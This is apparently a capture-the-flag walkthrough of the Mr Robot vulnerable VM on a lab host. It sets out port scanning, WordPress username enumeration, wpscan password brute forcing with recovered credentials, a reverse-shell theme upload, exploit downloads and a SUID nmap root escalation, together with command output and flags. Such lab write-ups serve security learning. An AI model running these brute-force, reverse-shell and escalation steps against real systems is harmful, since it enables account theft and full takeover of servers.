Mr Robot Walkthrough
After finding the IP with netdiscover:
root@kali:~# ip=192.168.50.71
root@kali:~# nmap $ip -p- -sV — reason
Starting Nmap 7.70 ( https://nmap.org ) at 2019–05–28 08:59 EDT
Nmap scan report for linux (192.168.50.71)
Host is up, received arp-response (0.00069s latency).
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp closed ssh reset ttl 64
80/tcp open http syn-ack ttl 64 Apache httpd
443/tcp open ssl/http syn-ack ttl 64 Apache httpd
MAC Address: 00:0C:29:58:E1:95 (VMware)```Hitting port 80 presents us with a whoismrrobot.com cli-styled landing page:
After resubmitting the “join” uri on my browser (actually anything string after the root directory), I reached the blog page that’s powered by wordpress.
Given the outdated wordpress version, I tried a msf exploit, which didn’t get me far:
msf > use exploit/unix/webapp/wp_phpmailer_host_header
msf exploit(unix/webapp/wp_phpmailer_host_header) > exploit[*] Started HTTPS reverse handler on https://192.168.50.2:8443
[*] Generating wget command stager
[*] Using URL: http://0.0.0.0:8080/zgziwnzg
[*] Local IP: http://192.168.50.2:8080/zgziwnzg
[*] Generating and sending Exim prestager
[-] Exploit aborted due to failure: no-access: WordPress username may be incorrect
[*] Server stopped.
[*] Exploit completed, but no session was created.
I went on to do a deeper scan of the wordpress instance:
wpscan --url http://192.168.50.71/join --enumerate uand while the above didn’t yield any username enumeration, I was shown that robots.txt was present:
User-agent: *
fsocity.dic
key-1-of-3.txtfsocity.dic was a 7+ mb wordlist which I obtained with wget. Key 1 of 3 was a string “073403c8a58a1f80d943455fb30724b9”.
I ran the wordlist against the server with wpscan but it took forever. Taking a closer look, there were a ton of duplicated entries — 75 of each to be exact.
awk '{for(w=1;w<=NF;w++) print $w}' ~/fsocity.dic | sort | uniq -c | sort -nrHere were the entries that stood out
# 150 123456Seven
1 uHack
1 psychedelic
1 imhack
1 iamalearn
1 ER28-0652
1 c3fcd3d76192e4007dfb496cca67e13b
1 ABCDEFGHIJKLMNOPQRSTUVWXYZ
1 abcdefghijklmnopq
1 abcdEfghijklmnop
1 abcdefghijklmno
(where c3fcd3d76192e4007dfb496cca67e13b === abcdefghijklmnopqrstuvwxyz)
From the wordpress page, I noticed a resource that was constantly being attempted to be loaded:
background-image: url('http://172.16.58.187/wp-content/uploads/2015/11/maxresdefault-1.jpg'Accessing that locally, I retrieved a regular Mr Robot themed background with no other leads.
I continued to work on the wordlist and deduplicated it:
cat fsocity.dic | sort | uniq > fsocity.dic.txtAnd to enumerate usernames from wordpress, I couldn’t use wpscan as that only bruteforces password with wordlist. It probably had to be done in a more manual way, so I inspected the network traffic to attempt to capture the response of different error messages presented by http://192.168.50.71/wp-login.php
The response was rather hard to capture from this endpoint, so I decided to go with forget password instead, which also validates the username — great.
I fired up Burp Suite to capture the same request-response, sent that to intruder, pasted in the deduped wordlist (since I’m on community version), and let my machine do the work:
A username soon surfaced, and I validated once more on wp-login.php and that prompted me a different error message. Taking the username, I bruteforced using wpscan using the same wordlist, and I got a match within a minute and a half:
root@kali:~# wpscan --url http://192.168.50.71/wp-login.php --wordlist /root/fsocity.dic.txt --wp-content-dir http://192.168.50.71/wp-content --username elliot
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________[+] URL: http://192.168.50.71/wp-login.php/
[+] Started: Sun Jun 9 11:59:35 2019[+] Interesting header: SERVER: Apache
[+] Interesting header: SET-COOKIE: wordpress_test_cookie=WP+Cookie+check; path=/
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-POWERED-BY: PHP/5.5.29
[+] robots.txt available under: http://192.168.50.71/wp-login.php/robots.txt [HTTP 200]
[+] humans.txt available under: http://192.168.50.71/wp-login.php/humans.txt [HTTP 200]
[+] security.txt available under: http://192.168.50.71/wp-login.php/.well-known/security.txt [HTTP 200]
[!] emergency.php has been found in: http://192.168.50.71/wp-login.php/emergency.php
[+] This site seems to be a multisite (http://codex.wordpress.org/Glossary#Multisite)[+] Enumerating WordPress version ...[i] WordPress version can not be detected[+] Enumerating plugins from passive detection ...
[+] No plugins found passively
[+] Starting the password brute forcer
[+] [SUCCESS] Login : elliot Password : ER28-0652Brute Forcing 'elliot' Time: 00:01:31 <================== > (5634 / 11452) 49.19% ETA: 00:01:34
+----+--------+------+-----------+
| ID | Login | Name | Password |
+----+--------+------+-----------+
| | elliot | | ER28-0652 |
+----+--------+------+-----------+[+] Finished: Sun Jun 9 12:01:14 2019
[+] Elapsed time: 00:01:39
[+] Requests made: 6282
[+] Memory used: 6.547 MB
The password looked familiar, because I had flagged it earlier on. Googling it, that number turned out to be Elliot’s employee ID. And I’m in!
Exploring the different tabs, I found another user:
root@kali:~# wpscan --url http://192.168.50.71/wp-login.php --wordlist /root/fsocity.dic.txt --wp-content-dir http://192.168.50.71/wp-content --username mich05654
...
...
[+] Starting the password brute forcer
[+] [SUCCESS] Login : mich05654 Password : Dylan_2791Brute Forcing 'mich05654' Time: 00:01:26 <================ > (5365 / 11452) 46.84% ETA: 00:01:38
+----+-----------+------+------------+
| ID | Login | Name | Password |
+----+-----------+------+------------+
| | mich05654 | | Dylan_2791 |
+----+-----------+------+------------+
The above wasn’t too helpful since account privileges were only of a regular subscriber. I hopped back to the admin user. Searching around on google for a reverse shell on wordpress, I came across some options to upload a malicious plugin or theme. I found https://forum.top-hat-sec.com/index.php?topic=5758.0 which describes embedding a reverse shell in a faketheme, and went on to install that.
While preview mode did not return me the reverse shell, activating the theme did:
Listing directory, I see the file http://192.168.50.71/you-will-never-guess-this-file-name.txt that writes “hello there person who found me.”.
Moving up a directory, I see the binary “updateip” that requires sudo. Navigating to /home, I see the 2nd key:
I submitted the md5 to http://cracker.offensive-security.com/index.php in hopes of finding the un-hashed password, but no plaintext was found. Using another reverse lookup tool, https://md5.gromweb.com/?md5=c3fcd3d76192e4007dfb496cca67e13b, I found the plaintext to be a rather unoriginal “abcdefghijklmnopqrstuvwxyz” (it didn’t work as sudo password anyways, probably because I didn’t get a full shell).
So I thought I should run some linux privilege escalation checker first. From http://192.168.50.71/wp-admin/themes.php, I uploaded a script from https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py and gave it a run:
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS…Note: Exploits relying on a compile/scripting language not detected on this system are marked with a ‘**’ but should still be tested!The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
— MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=cThe following exploits are applicable to this kernel version and should be investigated as well
— Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
— Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
— CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
— CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
— MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
— open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
— open-time Capability file_ns_capable() — Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
I also saw that /tmp has world-writable permissions, so I wget https://www.exploit-db.com/raw/37292 and compiled, but it failed to escalate:
$ gcc ofs.c -o ofs
$ ./ofs
spawning threads
mount #1
mount #2
child threads done
exploit failed
$The rest of the above exploit didn’t work either. Manual work then. Going through https://payatu.com/guide-linux-privilege-escalation/, I found a lead:
$ find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
$ /usr/local/bin/nmap --interactiveStarting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode — press h <enter> for help
nmap> !sh
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=0(root),1(daemon)
cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959find / -name "key-3-of-3.txt"
/root/key-3-of-3.txt
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Piecing the keys together, we get 073403c8a58a1f80d943455fb30724b9822c73956184f694993bede3eb39f95904787ddef27c3dee1ee161b21670b4e4 !
